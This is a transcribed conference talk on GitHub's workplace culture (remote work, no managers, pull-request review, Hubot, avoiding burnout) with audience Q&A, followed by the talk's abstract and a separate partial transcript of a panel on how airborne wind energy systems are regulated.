have tons of different kids, which is kind of awesome at this point. John Maddox a couple weeks ago had a kid. He's now a new dad. Tom, Preston Warner, our founder, is going to have his first kid. Paul over there in the audience, he spoke yesterday. He's going to have his kid later this year. Beth just announced that she's going to have hers. The point I'm saying about this is that it's good to embrace this sort of stuff. It's good to realize that people have lives outside of work. You know, this is probably my favorite side I've ever done because this is the whole get up family. I can embrace these people because they're all like sort of my kids. They're all people I like to hang out with outside of work because it's good. It's good to realize that people have lives outside of work because if you help them support that, they're going to do better code for you. They're going to come back to work really happy. They're going to come back to work really jazzed up to do that. So that's what I would say. Be a family company. That helps out people who may be single, who may not have families of their own, because being family friendly lets you try a lot of different things out. You can be much less hour centric. You don't have to worry about coming to work at certain hours. You can let people be flexible around their own hours and so on. And I really think that happy coworkers mean really productive companies. If you let people work on their own lives just as much as they work on their company, that's just going to end up being so much better for you. All this depends on a lot of trust though. And I think you really have to trust your employees to sort of have all this power amongst their own decisions and destiny. And I think that's fine because you hire these people. The number of times they will go through weeks of interviews and stuff with a company and then they throw all this management stuff on top of you. That doesn't make any sense. It's like they trust you to hire you and pay you money, but then they put all these micromanages on top of you where you can't, you have to come into work and come to all these meetings and stuff like that. I think that's really hostile. So basically you have to trust your employees, help them out if they're running into any problems or anything like that, and then verify they're doing work. Just every now and then check in, make sure that they're running into no problems or if there is something, fix it. And that basically just requires communication. We do a lot of this stuff. We talk to people, try and figure out what's preventing you from shipping this feature. Is there anything that's a problem? Do you have any time constraints, anything like that? And all you have to do is just end that communication. It goes a really long way. So in general, I think ours are bullshit. I think it's really hostile to think that our industry for some reason just thinks that if you throw ours at a problem, it's going to be a good thing. I don't think it is at all. Okay. I always want to talk about being asynchronous as well. And this is sort of my favorite part about GitHub. And I think this is what makes GitHub a lot different from other companies. Asynchronous in other words just means a distributed way of getting things done. And we do that in a number of different ways at GitHub. One is we're very geographically distributed. Two, we're very attention aware. Three, we're very team oriented. And four, we have very minimal process. And I'll get into each one of these individually. First of all, the geographically aware. GitHub is sort of headquartered in San Francisco. I finally looked at the numbers and we're about half and half people in San Francisco versus people in the rest of America, the rest of Europe, Australia, Asia. We're sort of all over the place at this point. And that's because it turns out the world's bigger than San Francisco. Like it would be great if you could hire everybody in your city and not have to look outside your little zone, but that's never going to happen. And that's great because we want to hire the best. And we don't have to worry about who happens to be down the street or who happens to be in our country. We can look anywhere in the world and figure out who we want to hire. So, with that under consideration, distributed work really needs to be a priority for us. We have to set up our company in order to work really well distributively so we can attract these people across the world and make them feel comfortable even though they may not be in the office with us every single day. Part of that is helped because of our flexible hours. Since we have no core work hours, you can sort of see work as being done at all times. You know, when America's sleeping, all of our European staff is sort of going hard at work or just, you know, talking, chatting, having social activity, whatever the case may be, there's always something happening now. And that's sort of been at the forefront of how we build our company for a long time. We're able to do this for a lot of different reasons. In general, we try to limit our in-person required contact. What do I mean by that? We do everything through chat. And I mean, if we're working on the same problem, in the same city, in the same office, on the same table, I'm still going to talk to you over chat rather than talk to you in person because, one, that gets people across the world involved in our conversation. So, if we're on some topic area that, you know, somebody in Europe has said, yeah, I've spent years on this, let me tell you my expertise on this, they would not have realized that we were talking about this if we were just talking about it over beers in San Francisco. And then, two, this means that everything is logged. So, three months from now, we can say, yeah, we discussed this a while back, what do we talk about, and you can just pull up the transcript. That's incredibly important. So, you can search through all the stuff that you talked about and have that physical log there ready for you to check out at any time. So, we pipe everything through chat. I'm going to talk about this a little bit more in the future. We've also been playing around with a few things. One of these is beer 30, which is sort of a weekly meeting we have at GitHub. It's sort of a stand-up meeting, 4.30, have a beer, and then usually the founders come out and talk about, you know, wherever the case may be, sometimes financial stuff, sometimes hiring, really big company, big picture stuff. And the important thing about this is that we live stream it so remote employees can see it in real time and then ask questions and feel like they are participating just as they were if they stood right next to them. Then we also record this as well. So, if you happen to miss the live stream, you can just download it and you can see exactly what happened, even though you weren't there present. Alongside that, we use like FaceTime and Skype and a lot of stuff. This is our situation room in the office. We've got like a nice table. We've got clocks on the wall because like clocks are important, I guess. There's a red phone there in case we want to like nuke somebody, I guess. So really important stuff. But we also have a bunch of iPads hooked up in there so you can FaceTime, put yourself on the TV. And this is really important if you were trying to feel somebody out for like an interview and we don't want to fly them in quite yet and we want to sort of get a feel for how they are in person. So that's really good. So in the cases where you do want to sort of get a face-to-face experience, there are lots of obvious technical ways to do this. And then about once a week, we have a bunch of recorded talks at GitHub. Sometimes internal, if somebody is really excited about what they're working on or some new technology they're working on, they'll get up and talk in front of everyone else. Sometimes we'll have other startups or other companies come in and talk about their product or something they're interested in they're working on. We had a couple PhD students come in and talk about their work just as sort of a fun way to sort of broaden everyone's horizons. The cool thing about this is that this is hooked up to... it's an Arduino-based connect-based motion tracking automatic recording system, sort of. So like I can be up here on stage and then like I've been told if I walk this far the camera can't see me. That's not the case in our office. The camera will track you on the connect. And then when you're done, that will get uploaded and then compressed and then delivered to our talks website all automatically because somebody was too lazy to press the record button and save. So that's really cool. But even though you're not in the office you can see everything that happened through this talk wherever you are. So I've been sort of saying I hate humans, which is somewhat the case, but it's not totally the case because I think it's really important to encourage this sort of structured team building from time to time. And we try to do this about twice a year and then a couple other times we'll send people who are remote into the office just to meet people and get some actual face-to-face time because it completely changes the game. This is 2010. We had a nice fancy dinner, all eight of us. And then Summit 2011, we had a nice little hotel weekend. And this was this year in San Francisco. We're already much bigger than this, which is crazy. But the whole point is that you get people meeting in real life. And especially if your whole life is sort of dictated by chatting with people and seeing their little gravitar, it's really easy to say, no, I don't really care about what you're thinking, whatever. But if you ever actually talk to somebody in person, you make that personal connection, you can get a better understanding of, well, if I do what I'm planning to do, I may actually screw this guy's life up a lot more. He may have to deal with more support tickets, or he may have to deal with the code fallout if I do this feature. So it really changes your opinion on how you work with your fellow employees. So it's really important, even though we try to issue face-to-face meetings, if you have very structured face-to-face meetings, they can be extremely productive. Also, GitHub's really attention-aware. Again, we want to get people in the zone as much as possible. We want to get people really happy, really productive, building really good code. And the problem with anything where you're pulling out of the zone is it all comes from distractions. So we try to minimize distractions as much as possible. Everyone has that experience where you're tapping away on code and you're really into it, and then you feel that tapping on your shoulder, and you're sort of talking to them, and you're still trying to tap and get into it, and then you have to talk to them some more, and then you get them to buzz off, and then you get back to it, and you're like, you totally missed your flow. And that takes you 5, 10, 15 minutes to get back to where you were. Like, that sucks. It takes a long time to get back into this sort of stuff. So we try to minimize these distractions as much as possible. One way we do this is we have no technical meetings, we have no stand-up meetings, we have no daily planning meetings, anything like that, partially because not everyone's in the office, partially because I don't think they're that productive. We can do all this stuff over chat. We also try to minimize in-person distractions. So again, if we're in the same office, rather than me going over and talking to you, I'll just ping you over chat. And usually everyone has like a window that will pop up, and you can ignore that, and it's perfectly cool to ignore that if you're in the middle of work. And it's sort of accepted that I'll get back to you when I'm totally done and ready with, you know, what I've been working on right now. And that's great. We also have no managers. We're at 83 employees right now, and we still have no managers, which I think is phenomenal. I think managers are very distracting. I apologize for any managers in the audience. And I think for all this stuff, we're sort of a special case, and I realize that. And we can work this way for a number of different reasons. One, we're a product company. Whenever I give a talk similar to this, usually the question at the end of this, somebody raises their hands and says, you know, how can I do this in my consultancy? And I'm like, you can't. That's sort of the trade-offs between being a product company and, you know, working for somebody else is that we have full control over a product, and we can build it as we see fit. That's really powerful. Secondly, we dog food get up all the time. We're our number one users. And before you guys get upset about something, we're usually upset about it. We know what part of GitHub we don't like, what part of GitHub we really like, and all of the above. So that gives you a different perspective and allows people to sort of work on what they want when they want. We also have full ownership. We never took VC, so we have entire control of the company. We don't have to answer anybody who wants us to do some weird, wacky thing. And on top of that, we've been profitable since day one, basically. We've been in a company where your runway is measured in months that completely changes your idea of what you need to do today versus what you need to do long-term. And we can focus on long-term and focus on what makes a really good product. But really, I think every company is different. And I think the main point of what I'm trying to say is that you have to analyze what can you do, what makes sense for your company. Maybe that's totally different from how we do it. And I think it's important to sort of reanalyze yourself and figure out how you can change this as much as possible. Because before long, if you've missed out on your opportunity, by the time you realize that you have missed out on it, it's far too late to change anything. Beyond that, as we've grown, I mean, I was employee number nine, and now, again, we're at 83. So I've seen how we've grown over time. Like many other companies, we've sort of become much more team-oriented over the years. We have lots of different teams now, different native teams, different software teams. And obviously, this is great. This is sort of the standard way of attacking different things. Small teams let us move really quickly and independently, and we basically let teams be in charge of whatever the product they're going to do. It's sort of the start-up within a start-up feeling where they're in charge of, like, the marketing, the direction, the long-term goals of the product, whatever the case may be. And it's really good to let them have the power to do that. We're able to do this practically through a lot of different ways. Mainly, we have different chat rooms for every single product, every single team that we have. So the Danger Room is sort of where you put funny cat pictures and animated gifs, because you've got to have one of those. If you don't have one of these in your company, I highly recommend it. It's amazing. We also have a room for serious talk. We have a room for the Enterprise team who works on, like, our Enterprise product design team, support team, all of these different rooms where you can have focused conversations just on that product and just with that team. So if you ever have a question, you can go over to that room and have a discussion base specifically on that. Small teams let you focus. And that's mostly what we're trying to do here, is that you can break up your focus and then let them focus on what really matters. And then finally, like, one of the coolest things that I really like about GitHub is we have a very minimal process. I think there's a lot of us at GitHub that really hates process of all kinds. And we end up doing a lot of things to sort of combat process all steps of the way. So the question at this point is sort of how do we let people actually do all this stuff? And it's sort of a simple answer, is that we let people plan it, build it, and then ship it. So how do we actually do all that? So in the planning stage, if you have an idea for anything that you're interested in doing, you basically show it as soon as possible. As long as you get somebody to look at it quickly, that's good. So we do this through chat. We have screenshots. People paste in all the time. The designer room, especially great, our designers will post in like, man, what if this page looked like this? And then at that point, everyone can say, yeah, that's great. Work on it. No, that's horrible. Change this or do this. And it's good to get that feedback as soon as possible on what people want changed. We also use pull requests substantially. This is our form of code review. I'll get into this a little bit later. We also have a number of wikis and internal apps to help us sort of align our ideas together. And I'll talk about this briefly. But in general, the whole point of this is to make sure that it's okay to say no. Both on the sides of me saying no to your idea, but you on the sides of accepting somebody to say no on your idea. And that's sort of easier said than done at some point. You don't want to get into the case where if I say no to something where you take that personally or anything like that. And I think we sort of have developed a culture where we can say no to a lot of things and keep very focused perspective on things. And that's totally fine. And if you really think that, you know, I'm totally wrong in saying no, you can say, well, I think you're wrong. And here's why. And then that sort of debate and argument is really good to have inside of a company. I was talking about sort of internal projects and stuff before. This is one of them. This is a get up team, which is sort of our project management stuff. Everybody contributes to it. I mean, everybody. We have a lot of non-technical people, HR people who contribute to team. And that's good because we can get ideas on interesting things. We can see status updates. We sort of use this as an internal Twitter. If you want to post a picture of something you're working on, it's kind of a nice way of saying, hey, check this out. Getting people excited about it. Get people to help you out on whatever you're building. We can also sort of avoid abandonment. We had a concept of projects in here where you could say, like, you know, I'm working on this. I need some help. And you can crawl everybody in to sort of help you out since we sort of have a decentralized way of making products where, you know, if I want to make something, I can build the back end. And then I sort of have to recruit a designer to help work on it with me. So it's sort of a, from there, it's, you sort of vote with your work. Where if you think an idea is really good, join them on it. But you can't just say, yeah, I think we should do that and then just sort of ignore it yourself and not work on it. So we get, when we move from the planning stage onto the building stage, you sort of have to look on how you actually build it. And one of the biggest foundations of this is how you branch code. How you build your code. How do you actually ship your code. And I've done a lot of support and stuff like that to large enterprise-y companies. And it's weird what people think is good branching strategies for Git, Subversion, CVS, wherever the case may be. We tend to use Git, but in general it's just strange how people put all these different permission structures and stuff on top of repositories and it gets really confusing. So this is what we do. We use Git, obviously. We have our master branch in Git. We branch off of that if you ever want to do a bug report, a bug fix or a feature or anything like that. And then you send a pull request and they merge it back in. Like this is it. The whole point is that it's very simple. And part of the reason behind this is that it's very designer-friendly and by that I mean non-technical. We do hire people who don't know Git as well as we do. And we still want them to feel like they can understand the concept behind getting their code into production as fast as possible. We try to have somebody ship it into production either the first day or first week of employment. Because we think it's really good to sort of get people as soon as possible doing real stuff rather than waiting months and months and months before their first contribution to the company. This is also good for us because we can do really simple rollbacks. If we do everything on like a branch for a bug fix, we can quickly roll back. This is important for us because we can deploy 30, 40, 50 times a day. So when you're doing that sort of stuff, if you deploy a branch to production, you can quickly roll back through a bunch of different ways. We can do partial deploys. We can deploy the code base just to our staff. So let our staff bang on it for a little bit. You can deploy to specific servers. You can deploy to specific processes on specific servers. And the whole thing is to limit our exposure in case a bug gets out there or something breaks or something unforeseen happens. And this is all sort of helped because we have a very simple basic branching strategy at our base. We don't have to go through some really complicated QA system or anything complicated like that. I mentioned earlier that we use pull requests substantially. And I wanted to talk a little bit about that. In general, I've worked at a few companies where you project code on a wall and you sort of go through line by line and saying like, yeah, is this good? Is this horrible? What do we want to do here? And that's, if you're ever doing that, it is the worst thing in the world. And I think that's bad. That's code review, I guess, but it's a horrible code review. And we sort of issue all of that and we do everything in pull requests. In general, pull requests are basically discussions about code. You push a branch up to GitHub and then you can discuss that branch before it goes in production. And we do this for everything. We do this for stuff that is one commit and changes like one line of one file just because that line is really, really important and we want people's feedback on that particular change. And we do this over a period of months. We've had some pull requests that have been alive for three, four, five, six months, active at certain points, and had dozens of people contributing to it because it was a really big change or it was a really long change or it had a lot of copy change wherever the case may be. It's a really nice way of getting all this discussion together and correlating it with code from there. The general workflow is you push a branch up, you get feedback on it, you're making improvements, you push code back to that pull request and let it grow and you merge that branch back in. Again, it's a very simple flow. It's something that somebody can figure out on their first day. You don't have to go through a QA department. You don't have to go through anything like that. And it's a nice way to do it. It's very asynchronous. It's non-invasive, meaning I don't have to go over to your desk and tap on your shoulder and say, hey, can you review this code so I can push to production? I can just make my pull request and then your email will pop up. Zack has made a pull request. Can you check it out? And we tend to do it based on, I've been involved in the billing code, therefore I should check out the billing pull request. Or your area of the company, you should review those pull requests. It's sort of a responsibility type of thing. They're very extremely visible for your organization. So if I do a pull request, again, it gets sent out an email to everybody in the organization, but it also shows up on your dashboard. It shows up in the pull request page. All that sort of stuff makes it very accessible to everybody. There's a nice one-click merge button if you don't want to deal with all of the git silliness and merging stuff. And then again, this sort of replaces our traditional code review. And I think that's really big. When you move from a sort of structured code review into letting people review stuff on their own time, where you don't have to pull yourselves away from whatever project you're working on, that becomes incredibly important. Then once you ship it, just quickly, we spend a lot of time on our test suite. We sort of consider fast tests to be really good, especially if we're deploying code, you know, the dozens of times we do a day. We want tests to be really quick. At this point, our test suite is something like 14,000 assertions in 200 seconds, which is still way too slow. We'd like this to be even faster, but, you know, it's important that the code you push is also fast in terms of tests. We sort of have a viewpoint of a slow test as a regression. So if you push something that slows down the test suite a lot, you know, that's almost as bad as pushing a bug to production. The faster you can have tests run, the faster you can push to production, the faster you can move as a company, and that becomes really awesome. Our test suite has actually gotten faster as we've grown with more and more people, which is kind of amazing to me. So in general, I don't think you need distractions. I think it's kind of bad. Any sort of physical presence required is just tricky. You don't need to be in the same country, and you don't need a lot of process. This is sort of one of those things where people default to throwing process at the problem when something else smarter could do. The number of stories I've heard from friends where somebody pushes a bad build to production, and then at that point everything blows up, and then the bosses say, okay, now we've got to have QA, now we've got to have write off, we've got to have sign off, we've got to do all these things. That's just really depressing. It should be much more accepting. If you push the production a bug, fix the bug, and then move on. That's how you can build better code from that point on. You don't have to layer process on top of it. It slows you down. It makes for a better or a worse product overall. Finally, I want to talk about sort of an internal thing that we say at GitHub is optimizing for happiness. And this is one of the most important things at GitHub as well. GitHub, when we started out, just a couple of people in 2008, and then 2009 we added a few more, 2010 we added a few more. This was last year, and then this was last month. We've grown dramatically over the last few years for a startup. And that's really great. Adding people is always a good thing. We're at 83 employees right now, but that's not the number that's interesting. The really fascinating number for GitHub is that we've never had anybody leave. And that is phenomenal considering we are in the computing industry in general, and we're in Silicon Valley on top of that. I've heard stories of people jumping from company to company every six months because they can just get their salary raised 10% every single job they get, just because they had a salary at the last company. So people tend to jump around companies a lot, and I think it's really horrible because no one really understands how much of a problem that is. If you lose somebody, you lose all of their institutional knowledge, which sucks. But then it takes weeks or months to try and find somebody to replace them, and it takes weeks or months for that person to come up to speed to where they're at, where the person that you lost their knowledge was at. And that really sucks to lose people. So we try to figure out ways to mitigate that. How do we sort of imprison people into happiness where they never ever want to leave GitHub, you know? And we come up with a number of different ways to do that. So in general, how do we make our happiness-oriented workplace is what I'm trying to say. Most of the time people leave because of burnout, at least from what I've seen. Sometimes people leave for better job opportunities, stuff like that, but a lot of the times people just barely burnt out on whatever they're doing. And there are lots of ways where you can sort of combat that. One is exploration, letting people sort of explore their own boundaries. Two is letting them have a lot of freedom, and then three is having a lot of self-direction in your job. So in terms of exploration, we do this in a number of different ways. We have lots of shared side projects at GitHub, and this is really kind of fun. I don't know if any of you guys know HuBot. HuBot's our chat room robot who sits in all of our chat rooms and we can talk to him. He sort of began as a kind of a weird thing, and you can have him do funny stuff like put mustaches on images, find animated gifs and all these memes and all that silly stuff. But we also have built lots of crazy stuff into him, too. Like he deploys our entire site. So a designer on his first day can type HuBot, deploy, get up to production, and then that deploys it to all of our 50, 60-some servers, restarts the correct processes, does all the code checkout, compiles our assets. There's a whole laundry list of stuff that it does, but he doesn't have to worry about that. He just has to type HuBot, deploy to production, and that's it. You can do tons of shell commands, all of our graphing is done through HuBot. There's lots of really real business stuff we do through HuBot as well. But the whole point here is that it's a shared site project that we can all sort of hack on. He's written in JavaScript, so he's accessible to people who, you know, JavaScript is sort of the glue language between lots of people who may know, like Windows technologies versus PHP or Ruby or wherever the case may be, so it's much more accessible for our designers and developers to work on him. And we sort of encourage this where, man, if you really burnt out on whatever project you're working on, even though that may be a really interesting project, sometimes you just want to like fart around for half a day and say, man, I want HuBot to return smart alec responses if I ask him about, I don't know, World War II or something like that. And that's good. If it makes it really interesting culture-wise for the rest of the company, that's cool, because not only will there be hopefully something interesting coming out of your hacking on this side project, but it also puts you in a better place mentally and emotionally, where you can say, man, I'm just going to work on something fun and easy and interesting and something that sort of challenges me as a person. We also have a ton of different internal apps. This is from Help, which is our sort of help slash support system. And this all stemmed from one of our support guys, it's like, man, I really hate our support system. I'm going to build this sort of like, sort of an app that sort of manages my cues a lot better. And then a few months later, someone came by and was like, hey, this is cool, I'm going to make it look pretty. And then before we knew it, like four or five months later, just on the side, we had this amazing support site. And this is great because now all of our support people can use Help, and it totally changes their lives. Like, it literally makes them more productive, more happy to work for us. So by going out of your way and saying, I'm not going to work on my normal job today, I'm going to work on some internal app, you're helping yourself because you're splitting up the grind of working on normal work stuff. But you're also helping the rest of the company work better at their own jobs. We also do a lot of just weird stuff like hardware hacking. This is an iPod touch connected to flat screens in our office because somebody said one day, hey, I want to be able to push random URLs to TV screens around the office. So somebody made an iOS app, very cheap, and by iPod touch is pretty cheap, connected to TV. And now from Hubot, you can say, Hubot, push this URL to this particular TV, and then you can put nice, you know, our load graphs or something on that particular TV, or whatever the case may be. This is also really cool because even if you're not in the office, I know one of our system ins in Japan had his iPad next to his screen with all of the load graphs and stuff using this app. So because we sort of built this the way we did, now he can get all of his graphs and feel like he's getting sort of the office experience just from sitting at home. And that's sort of an unintended good side effect that came from this. So we encourage a lot of that stuff as well. We also have something called Play. We're kind of a weird eclectic musical group at GitHub. A lot of us are artists, so we have music playing all the time, which is kind of awesome. The challenge is how do you control who plays what on the speakers? So we built sort of a DJ app where you can request, again, through Hubot, HuBot Play, Daft Punk, and then we'll queue up 10 Daft Punk tracks and then play over the speakers, and that's great. And again, since we don't want this to be just office only, we stream this for all of the other employees to listen to at home. It seems sort of stupid, maybe, but it's actually, you know, I was skeptical at first, but as soon as like something comes on, like Garth Brooks comes on, and then everyone's like, what the hell is playing? And then people start talking about it. It's sort of you mitigate that experience of being, you know, remote, basically. Where you can say, like, man, we're listening to the same thing across the world, and it's kind of amazing. It's, you know, bringing people together. So stuff like that's kind of fun. We encourage people to work on these shared side projects because it brings people together in sort of interesting ways that they wouldn't otherwise, and it keeps people fresh when you're actually building on these fun things. Beyond that, we encourage people to broaden their horizons intellectually. We buy Kindles, and we, you know, we'll give out e-books to everybody in the company as well. A couple months ago, we got React books for everybody in the company because people wanted to learn React. Not necessarily we're going to use it in production, although we do, but it's good to get people sort of trying out new technologies just because it keeps people fresh, keeps people interested in new solutions. A while ago, people wanted to hack on Arduino. If you're not familiar, Arduino is just open source hardware hacking, which is great, especially for a lot of the designers, a lot of people who are only in the software world, who have never done hardware hacking before. We had somebody come in and sort of let people build little tiny gizmos and stuff. That was awesome, very different from the normal day-to-day job, and you're sort of getting a different perspective on different kinds of programming, different kinds of technology. And then somebody wanted to learn Spanish, so we brought in a Spanish tutor, and eventually the dude went and gave a talk in Spanish somewhere in a Spanish-speaking country, which is the craziest thing I've ever heard, and frightening. And then beyond that, along the lines of broadening your horizons intellectually, we encourage a lot of networking. If you get accepted to speak anywhere in the world, GitHub will send you and a travel buddy, another employee of GitHub, to go there, because it's important to sort of get out there and see new things. One, it's really good marketing for us, obviously, I guess. Your talk is probably good, unless your talk is horrible. And then you'll usually sponsor drink-ups in the city, so you can meet people locally and sort of just enjoy socializing with people. And meeting people is sort of the best part of all this. One, you can hire them, and we do hire lots of people that we meet in conferences and drink-ups and stuff like that, just because it's a nice atmosphere to meet people in. But in general, socializing is really fun. Especially, like, I've gotten, because of this sort of stuff, I've been sent to really weird conferences that I never would have otherwise. Strange Java conferences in the middle of like, rural, random countries. And it's phenomenal, because I end up catching these talks that, like, I'll never use in my day-to-day work, but just being there, it gives you a different perspective on things. It sort of grows your mind, you get to talk to people about different technologies that you wouldn't otherwise and sort of compare notes on how things are going. And again, you're trying to minimize burnout with, you know, working the same stuff all the time. If you can sort of encourage people to get out of their comfort zone and do some stuff like this, that's really awesome. So burnout happens when you're out personally growing. I really think that's an important thing for GitHub, is that we try desperately to try and make people sort of grow themselves throughout their employment. Beyond that, we try to give employees a lot of freedom as well. I mentioned earlier we have no set hours, partially because we couldn't in terms of international employees. I wouldn't know what hours we would set where people would have to wake up at like three in the morning, something sane like that. We have no managers. We have no meetings as well, which is great. There's basically no need to be in the office. We have a lot of San Francisco people who actually don't go to the office because they're just not productive there. You know, when it's time to ship the really impressive code that they want to push out that day, they go to a cafe because the cafe is where they're most productive. That's not me. That is crazy to me. But we want to support that. We want people to be productive wherever they are. And then on top of that, we have no vacation tracking or anything like that, which is just another small thing of saying, you know, we trust you to make smart decisions on how you treat your time. And between those last two things, you don't have to be in the office and you can sort of take vacations whenever you can. We encourage people to sort of travel all over the place. A lot of us got us shared a ski condo last year with a whole bunch of different get-hubbers just so we could go ski and then hack from the ski mountain, which is great. Just a change in venue is really healthy sometimes. And then finally, just self-direction, giving people a sense that they actually have power in what they do is really important. We let people work on things that interest them. They can basically work on, they choose on what they want to work on. And that is really kind of rare. We don't really have bosses that say, alright, now, Joe, work on this, and Nancy, work on this, and you have to do this, buy this, and this date. We don't really have deadlines at all either, because we don't trust people to work on something and be done with it when it's ready. And again, we have teams, but our teams are set up so they're very easy to move around. And that's the problem with teams, if they're very structured where you can't get out of them. If I want to bounce around on the Enterprise team for a week because that's interesting to me or they need my help with some particular problem that they're facing, I should feel totally fine to do that. That's actually exactly what I do at Get-Up now. I started out working on Get-Up Firewall Install, and it was just me for a year and a half, and now we have a team of about 15 people doing the job I was doing, which makes me feel amazing. But before that point, I was just kind of burnt out, and I talked to the founders about this, and I'm like, yeah, I just work on something else. So I'm off that team now, and it's just totally, you know, I'm not burnt out anymore, and I can sort of drift in when I want to work on that, and it's great that you can sort of move around, and it totally changes your perspective on, you know, feeling trapped inside of a company. So in general, just keep your employees really, really, really happy. Think about what works in your situation, what's your employee's value? Is there anything that you can do differently today that can change things? So in conclusion, just be flexible about stuff. Be flexible about hours, be flexible about requirements, process, anything like that. Build a company you want to work for, and again, I want to stress that I don't think this is a founder thing necessarily. I don't think this is a manager thing. I think this is sort of the most change can come from sort of the loliest employee, willing to say, okay, what can I change in my day to day? What can I mention to people that maybe we could structure a company differently where something is more interesting to work for, or we can get people really excited to come into work? And then finally, just push for happiness. I don't know why we would do this stuff unless it didn't make us happy. It's the most insane industry in the world where we can build stuff out of our minds and then push code and then make money on it. It's amazing. So thanks. I mean, this is basically how it really works, to be honest. In terms... No, we've definitely fired people. We've definitely fired people. Nobody is left willingly, which I think is a far more interesting statistic. Yes. I was going to get to it. So in terms of that, in hindsight, through all those people that we've ended up letting go, I don't think it's been much of a surprise, especially for the people on the particular team that they were on, at least from what we've seen so far. The people who are sort of in charge of that team or who are spiritually the leader or whatever like that tend to have a really good idea about who is sort of holding their weight and who isn't. And it's sort of informal. We don't really do checklists like, are you a douchebag? Yes, but you're fired or something like that. So it's sort of much more case-by-case basis because we haven't gotten to the point where we haven't had to fire a lot of people. So there's no real structure surrounding that, but there is sort of a feeling of, you know, people tend to know because we do have a very high culture of everyone should be shipping something, everyone should be contributing, everyone should be doing something productive. And it's hard to be in that zone and still feel like it's equitable if somebody else is not pulling their weight across the way in some other team or something like that. Yep. What was that? I think that nobody left is a good sign that everyone's happy. Again, like, we're sort of the company where, like, we tend to talk a lot outside of work, and you can get a pretty good barometer of how people are happy. A number of times I've literally just asked people, like, are you happy here? Is there anything we can change? Is there anything that we can do differently? And we have lots of discussions internally on GetUp Team, our internal app, of, like, you know, expense reports really suck. How can we make this even better where I don't have to worry about this stuff? Or, like, you know, here's some stress point. This sucks. How can we make this better? We sort of all reanalyze all those points all of the time. And literally there's something every single day that is some internal thing that somebody is angry about and wants to change for the better. And it's sort of a culture built up to support that where you're constantly improving the internal culture. What's the average time that you spend an hour working? A reasonable hour. I think... Not that many hours. No, it's definitely like, it's a reasonable amount. And there's definitely, like, for me, when I'm in town and actually doing, you know, non-travel work, I'll probably do five or six hours at the office, then go home and then sort of sit online until I go to sleep. Just sort of shooting the shit in the danger room. Slash, you know, responding to emails, doing whatever. But that's sort of like off work. That's sort of a soft, you know, discussion side of things rather than doing actual code. So it can go back and forth depending on the day, the week, the month, or whatever. My busy schedule is outside of work. But again, it's more... You want to feel like you're pulling your weight, but not overwork yourself. What if something happened to you inside that's... Yeah, that's fine. Yeah. No, we had a... Yeah, no, shit definitely happened a few months ago to one of our employees, and he basically just took a couple months off and no one really, you know, worried about it. And he's sort of doing half-time or something like that, building up to it. Do you stress that you feel that you have to leave or do you have to leave or do you have to leave? We're cool with whatever you want to do. If you think that it's good, like seriously, if you think that it's cool for you to be back to work, if you think it's cool for you to be, you know, doing the stuff that you're doing, we trust you that that is the right decision that you want to make. What's your gender rate? Not good. I'm just wondering, seriously, what do you guys have like a better traffic? We are... That is something that we are definitely improving upon. I want to say we're doubling in the next few weeks our female employees in general, which is, I'm really excited about, it's still abysmal. No, I think we're doing... Maybe you guys can help me out. I think we have like what, four total right now? Five out of 80. And then we're hiring through for more. Yeah. Which is still abysmal, but then again, it's... Man, tech blows for that. That's one of our major problems, I think. Yeah. Yeah. We need to be actively changing this in order to prevent the traffic. We can't just divide and open things on itself, because they won't have to do that. Do you have to actively hire or have some kind of person that would like to speak with your culture? Or the culture like, try to embrace the new culture? Because people are different in some way, it's more structured. Yeah. Or do you have like some people who would like to speak with their... Yeah, it's... I think in hindsight, some of the people we let go, that was sort of the problem is that, it wasn't a slight to them, it was just they couldn't really handle that type of freedom. And they were just better in a much more structured environment. Which is understandable. It can be really strange and intimidating your first day when it's just like, all right, work on something. And it's like, what? So we try to find people who, one, have done open source work, because that's really good indicator of like, you know, you're doing this on your own time, and you sort of know how to build something interesting and deal with users and stuff like that. Or just people who show an interest in, you know, just building a product. They really can work on their own time and stuff like that. The problem is it's kind of hard to judge when you're just meeting somebody, or just knowing for them for a couple weeks beforehand. But there's also, I mean, we're really kind of hands on for a while. Like the first week you'll be paired up with sort of a buddy or something like that. So they'll sort of help you learn the ropes, help you sort of direct you and guide you. And then your first few months, we're always sort of checking in to make sure that, you know, you're feeling comfortable and stuff like that. So it's sort of a give and take on both sides of those, I think. Anybody else? Cool. Thanks.
|
GitHub consists of a bunch of employees who have worked at other companies in the past and despised it. Okay, maybe they weren't all terrible jobs, but a lot of us remain skeptical of most software development practices. We do things differently at GitHub. We don't have meetings, we don't have managers, we don't do traditional code review, and we aren't always in the same room, much less on the same continent. And we couldn't be happier about it. We ship code quickly, without a lot of red tape, and still maintain an incredibly high level of code quality. It's a great way to keep your developers happy, and we think it can work in your company, too.
|
10.5446/50840 (DOI)
|
My name is Editha Momen, I'm from Arthur University and so my background is aviation, so before I joined the Department of Universities working in Havas and so while when I was reading, we had a discussion before, so I consider an airborne wind energy system as a clear airborne device, something which is in data, is using the airspace and when I propose it, consider it as an aircraft, the system which is flying here because there is something where a lot of maybe most of the rest come from. So I just want to first comment, one of the sentences you said in the very beginning, to ensure safe operation, any accident can harm the entire sector, that should not, the statement is right, but it should not frighten us because we know there will be accidents, the only thing I know from my own aviation work in Havas as well, make it clear that if something happens that you work properly according to safety standards, an aviation does a lot, does also a lot here and one good thing is, so we are using the term certification in aviation I do not personally recommend using this in airborne wind energy, so I would rather name it quantify the system with appropriate safety standards, that's what we need to achieve and the good thing about that currently the regulations for unmanned aerial systems changed in Europe, we've seen it on your slides, the other came up with new rules, there will be more in July next year and they invented a special category, it's called special operation, so it's not open, it's not certified, it's something in between, anywhere in between the activities and this allows us flexibility to make it work properly in a sense and that's why I want to make it stronger, so consider this system as an ever-needful and it will not be a lot of pain. Thank you. Well I'll present, I'm Neil from McConnay, I'll present an alternate point of view, I also come from the aviation world, I pilot a couple thousand hours of operating time in the US military, and I will make a case that and I'll do this in my talk tomorrow as well, that we're talking about wind turbines, not aircraft, but wind turbines, that are obstructions, much like a tall building or a tall tower, or in fact a wind turbine, and in every case practically speaking, from a pilot's point of view, if you were to look out on the horizon, you would not expect an energy case to be in one part of the sky, one minute, and another part of the sky, the other minute, it might be moving locally, but it's there, and if I go through my process of navigating from point A to point B, I do a chart study, I know where the obstructions are, they're either on the chart or they're noted, for the standard procedure that's already in place for all obstructions, if I have failed to do that because I'm a bad pilot, then the kite or energy system is marked and lighted in an appropriate way as a backup, but those are standard obstruction methodologies that have been in use for a long time, I would also say from a, that's sort of from an airspace perspective, because from an airspace perspective, what we're trying to do is protect from a pilot going and 